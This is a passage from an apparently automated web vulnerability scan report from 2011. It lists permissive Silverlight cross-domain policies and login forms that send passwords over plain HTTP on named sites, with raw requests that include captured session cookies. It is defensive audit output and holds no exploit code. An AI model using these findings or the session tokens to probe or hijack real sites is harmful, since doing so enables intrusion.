HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:01:45 GMT Server: Omniture DC/2.0.0 xserver: www393 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.12. http://pixel.quantserve.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.quantserve.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: pixel.quantserve.com
Response
HTTP/1.0 200 OK Connection: close Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Wed, 07 Sep 2011 14:56:57 GMT Content-Type: text/xml Content-Length: 312 Date: Tue, 06 Sep 2011 14:56:57 GMT Server: QS <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* "/> </allow-from> <grant-to> <resour...[SNIP]...
5.13. http://s0.2mdn.net/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://s0.2mdn.net
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Vary: Accept-Encoding Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Tue, 06 Sep 2011 00:34:25 GMT Expires: Fri, 02 Sep 2011 23:16:39 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Age: 51825 Cache-Control: public, max-age=86400 <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="* "/> </allow-from> <grant-to> <resource ...[SNIP]...
5.14. http://secure-us.imrworldwide.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://secure-us.imrworldwide.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: secure-us.imrworldwide.com
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 14:56:57 GMT Content-Type: text/xml Content-Length: 255 Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT Connection: close Expires: Tue, 13 Sep 2011 14:56:57 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes <?xml version="1.0" encoding="utf-8" ?> <access-policy> <cross-domain-access> <policy> <allow-from> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </grant...[SNIP]...
5.15. http://speed.pointroll.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://speed.pointroll.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: speed.pointroll.com
Response
HTTP/1.0 200 OK Content-Length: 348 Content-Type: text/xml Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT Accept-Ranges: bytes ETag: "80a33917f91cb1:51d" Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:57:11 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://* " /> </allow-from> ...[SNIP]...
5.16. http://stats.deloitte.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://stats.deloitte.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: stats.deloitte.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:57:02 GMT Server: Omniture DC/2.0.0 xserver: www384 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.17. http://wingateweb.112.2o7.net/clientaccesspolicy.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://wingateweb.112.2o7.net
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: wingateweb.112.2o7.net
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:56:53 GMT Server: Omniture DC/2.0.0 xserver: www93 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="* " /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </...[SNIP]...
5.18. http://cnbc.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://cnbc.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: cnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 19 May 2011 23:55:16 GMT Accept-Ranges: bytes ETag: "0a59338016cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 14:57:43 GMT Connection: close Content-Length: 1330 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://*.interactive.msnbc.com "/> <domain uri="http://*.interactive.msnbc.com:8080 " /> <domain uri="http://*.interactive.msnbc.com:8095 " /> <domain uri="https://*.interactive.msnbc.com "/> <domain uri="https://*.interactive.msnbc.com:9443 " /> <domain uri="http://*.msnbc.msn.com "/> <domain uri="https://*.msnbc.msn.com "/> <domain uri="http://*.fareast.corp.microsoft.com "/> <domain uri="http://*.fareast.corp.microsoft.com:8080 " /> <domain uri="http://*.fareast.corp.microsoft.com:8095 " /> <domain uri="https://*.fareast.corp.microsoft.com "/> <domain uri="https://*.fareast.corp.microsoft.com:9443 " /> <domain uri="http://*.msnbc-test.msnbc.com "/> <domain uri="http://*.msnbc-test.msnbc.com:8080 "/> <domain uri="http://*.msnbc-test.msnbc.com:8095 "/> <domain uri="https://*.msnbc-test.msnbc.com "/> <domain uri="https://*.msnbc-test.msnbc.com:9443 "/>...[SNIP]...
5.19. http://cvs.shoplocal.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://cvs.shoplocal.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: cvs.shoplocal.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Wed, 24 Feb 2010 18:37:08 GMT Accept-Ranges: bytes ETag: "0a2895e80b5ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" Content-Length: 950 Date: Tue, 06 Sep 2011 17:06:25 GMT Connection: close <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="http://*.msn.com " /> ...[SNIP]... <domain uri="http://*.msn-int.com " />...[SNIP]... <domain uri="http://*.crossmediaservices.com "/> <domain uri="http://*.shoplocal.com " /> <domain uri="http://vqascweb1 "/> <domain uri="http://vqascweb2 "/> <domain uri="http://devweb1 " /> <domain uri="http://media.pointroll.com " /> <domain uri="http://www.pointroll.com " /> <domain uri="http://data.pointroll.com " /> <domain uri="http://speed.pointroll.com " /> <domain uri="http://mirror.pointroll.com " /> <domain uri="http://geo.pointroll.com "/> <domain uri="http://*.pointroll.com "/>...[SNIP]...
5.20. http://executivevision.cnbc.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://executivevision.cnbc.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: executivevision.cnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 19 May 2011 23:55:16 GMT Accept-Ranges: bytes ETag: "0a59338016cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 15:04:28 GMT Connection: close Content-Length: 1330 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://*.interactive.msnbc.com "/> <domain uri="http://*.interactive.msnbc.com:8080 " /> <domain uri="http://*.interactive.msnbc.com:8095 " /> <domain uri="https://*.interactive.msnbc.com "/> <domain uri="https://*.interactive.msnbc.com:9443 " /> <domain uri="http://*.msnbc.msn.com "/> <domain uri="https://*.msnbc.msn.com "/> <domain uri="http://*.fareast.corp.microsoft.com "/> <domain uri="http://*.fareast.corp.microsoft.com:8080 " /> <domain uri="http://*.fareast.corp.microsoft.com:8095 " /> <domain uri="https://*.fareast.corp.microsoft.com "/> <domain uri="https://*.fareast.corp.microsoft.com:9443 " /> <domain uri="http://*.msnbc-test.msnbc.com "/> <domain uri="http://*.msnbc-test.msnbc.com:8080 "/> <domain uri="http://*.msnbc-test.msnbc.com:8095 "/> <domain uri="https://*.msnbc-test.msnbc.com "/> <domain uri="https://*.msnbc-test.msnbc.com:9443 "/>...[SNIP]...
5.21. http://media.cnbc.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://media.cnbc.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: media.cnbc.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 19 May 2011 23:55:16 GMT Accept-Ranges: bytes ETag: "0a59338016cc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Content-Length: 1330 Date: Tue, 06 Sep 2011 14:56:31 GMT Connection: close Cache-Control: public, max-age=900 ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://*.interactive.msnbc.com "/> <domain uri="http://*.interactive.msnbc.com:8080 " /> <domain uri="http://*.interactive.msnbc.com:8095 " /> <domain uri="https://*.interactive.msnbc.com "/> <domain uri="https://*.interactive.msnbc.com:9443 " /> <domain uri="http://*.msnbc.msn.com "/> <domain uri="https://*.msnbc.msn.com "/> <domain uri="http://*.fareast.corp.microsoft.com "/> <domain uri="http://*.fareast.corp.microsoft.com:8080 " /> <domain uri="http://*.fareast.corp.microsoft.com:8095 " /> <domain uri="https://*.fareast.corp.microsoft.com "/> <domain uri="https://*.fareast.corp.microsoft.com:9443 " /> <domain uri="http://*.msnbc-test.msnbc.com "/> <domain uri="http://*.msnbc-test.msnbc.com:8080 "/> <domain uri="http://*.msnbc-test.msnbc.com:8095 "/> <domain uri="https://*.msnbc-test.msnbc.com "/> <domain uri="https://*.msnbc-test.msnbc.com:9443 "/>...[SNIP]...
5.22. http://msnbcmedia.msn.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://msnbcmedia.msn.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: msnbcmedia.msn.com
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:08:37 GMT Content-Length: 1330 Content-Type: text/xml ETag: "0a59338016cc1:0" Last-Modified: Thu, 19 May 2011 23:55:16 GMT Accept-Ranges: bytes Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Connection: close ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://*.interactive.msnbc.com "/> <domain uri="http://*.interactive.msnbc.com:8080 " /> <domain uri="http://*.interactive.msnbc.com:8095 " /> <domain uri="https://*.interactive.msnbc.com "/> <domain uri="https://*.interactive.msnbc.com:9443 " /> <domain uri="http://*.msnbc.msn.com "/> <domain uri="https://*.msnbc.msn.com "/> <domain uri="http://*.fareast.corp.microsoft.com "/> <domain uri="http://*.fareast.corp.microsoft.com:8080 " /> <domain uri="http://*.fareast.corp.microsoft.com:8095 " /> <domain uri="https://*.fareast.corp.microsoft.com "/> <domain uri="https://*.fareast.corp.microsoft.com:9443 " /> <domain uri="http://*.msnbc-test.msnbc.com "/> <domain uri="http://*.msnbc-test.msnbc.com:8080 "/> <domain uri="http://*.msnbc-test.msnbc.com:8095 "/> <domain uri="https://*.msnbc-test.msnbc.com "/> <domain uri="https://*.msnbc-test.msnbc.com:9443 "/>...[SNIP]...
5.23. http://www.cnbc.com/clientaccesspolicy.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.cnbc.com
Path:
/clientaccesspolicy.xml
Issue detail
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains. Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression. Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.cnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 03 Sep 2011 14:41:54 GMT Via: 1.1 C aicache6 Content-Length: 1330 X-Aicache-OS: 207.46.150.45:80 Connection: close Keep-Alive: max=20 Expires: Tue, 06 Sep 2011 14:57:33 GMT ...<?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*" > <domain uri="http://*.interactive.msnbc.com "/> <domain uri="http://*.interactive.msnbc.com:8080 " /> <domain uri="http://*.interactive.msnbc.com:8095 " /> <domain uri="https://*.interactive.msnbc.com "/> <domain uri="https://*.interactive.msnbc.com:9443 " /> <domain uri="http://*.msnbc.msn.com "/> <domain uri="https://*.msnbc.msn.com "/> <domain uri="http://*.fareast.corp.microsoft.com "/> <domain uri="http://*.fareast.corp.microsoft.com:8080 " /> <domain uri="http://*.fareast.corp.microsoft.com:8095 " /> <domain uri="https://*.fareast.corp.microsoft.com "/> <domain uri="https://*.fareast.corp.microsoft.com:9443 " /> <domain uri="http://*.msnbc-test.msnbc.com "/> <domain uri="http://*.msnbc-test.msnbc.com:8080 "/> <domain uri="http://*.msnbc-test.msnbc.com:8095 "/> <domain uri="https://*.msnbc-test.msnbc.com "/> <domain uri="https://*.msnbc-test.msnbc.com:9443 "/>...[SNIP]...
6. Cleartext submission of password
previous
next
There are 6 instances of this issue:
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
6.1. http://digg.com/submit
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://digg.com
Path:
/submit
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:31 GMT Server: Apache X-Powered-By: PHP/5.2.9-digg8 X-Digg-Time: D=23877 10.2.130.26 Cache-Control: no-cache,no-store,must-revalidate Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8467 <!DOCTYPE html> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta charset="utf-8"> <title>Digg - Submit a link </title> <meta name="keywords" content="Digg, pic...[SNIP]... </script><form class="hidden"> <input type="text" name="ident" value="" id="ident-saved"> <input type="password" name="password" value="" id="password-saved"> </form>...[SNIP]...
6.2. http://www.bigcommerce.com/freetrial.php
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bigcommerce.com
Path:
/freetrial.php
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.bigcommerce.com/signup.php The form contains the following password fields:
Request
GET /freetrial.php HTTP/1.1 Host: www.bigcommerce.com Proxy-Connection: keep-alive Referer: http://www.bigcommerce.com/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:37:52 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 10579 Connection: close Content-Type: text/html <style> .FreeTrialForm { background:#FFF !important; border:1px solid transparent !important; } .FreeTrialForm p { color:black !important; } .NoCCRequired { color:gray !important; font-weight:bold; }...[SNIP]... </div> <form action="/signup.php" name="signupform" method="post" onsubmit="return CheckHPForm()" style="margin: 0px;"> <input type="hidden" name="roi_formpage" value="/freetrial.php" />...[SNIP]... <td> <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password" name="password"/> <div style="font-size: 11px; color: gray; font-style: italic;">...[SNIP]... <td> <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password2" name="password2"/> </td>...[SNIP]...
6.3. http://www.oraclecfo.com/Authentication/Login_w.html
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oraclecfo.com
Path:
/Authentication/Login_w.html
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.oraclecfo.com/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== The form contains the following password field:ctl00$cphPlaceholder$ctl00$txtPassword
Request
GET /Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== HTTP/1.1 Host: www.oraclecfo.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; OracleCFOCountry=282; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:11:22 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 19964 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <hea...[SNIP]... <![endif]--> <form name="CFOForm" method="post" action="/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_cphPlaceholder_ctl00_btnLogin')" id="CFOForm"> <div>...[SNIP]... <dd class="floatright clearRight" style="margin-bottom: 0;"> <input name="ctl00$cphPlaceholder$ctl00$txtPassword" type="password" id="ctl00_cphPlaceholder_ctl00_txtPassword" class="mandatory xlgTextbox" /> </dd>...[SNIP]...
6.4. http://www.oraclecfo.com/Main/Home/Home_w.html
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oraclecfo.com
Path:
/Main/Home/Home_w.html
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.oraclecfo.com/Main/Home/Home_w.html The form contains the following password field:ctl00$ucNavigationBar$LoginBar_w1$txtPassword
Request
GET /Main/Home/Home_w.html HTTP/1.1 Host: www.oraclecfo.com Proxy-Connection: keep-alive Referer: http://www.oracle.com/index.html# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:10:45 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 52760 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <hea...[SNIP]... <![endif]--> <form name="CFOForm" method="post" action="/Main/Home/Home_w.html" id="CFOForm"> <div>...[SNIP]... </label> <input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" /> </li>...[SNIP]...
6.5. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.oraclecfo.com
Path:
/Main/Solutions/Solutions_w.html
Issue detail
The page contains a form with the following action URL, which is submitted over clear-text HTTP:http://www.oraclecfo.com/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 The form contains the following password field:ctl00$ucNavigationBar$LoginBar_w1$txtPassword
Request
GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1 Host: www.oraclecfo.com Proxy-Connection: keep-alive Referer: http://www.oraclecfo.com/Main/Home/Home_w.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c
Response
HTTP/1.1 200 OK Cache-Control: private Date: Tue, 06 Sep 2011 16:12:24 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly Vary: Accept-Encoding Content-Length: 50539 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <hea...[SNIP]... <![endif]--> <form name="CFOForm" method="post" action="/Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82" id="CFOForm"> <div>...[SNIP]... </label> <input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" /> </li>...[SNIP]...
6.6. http://www.shopify.com/login
previous
next
Summary
Severity:
High
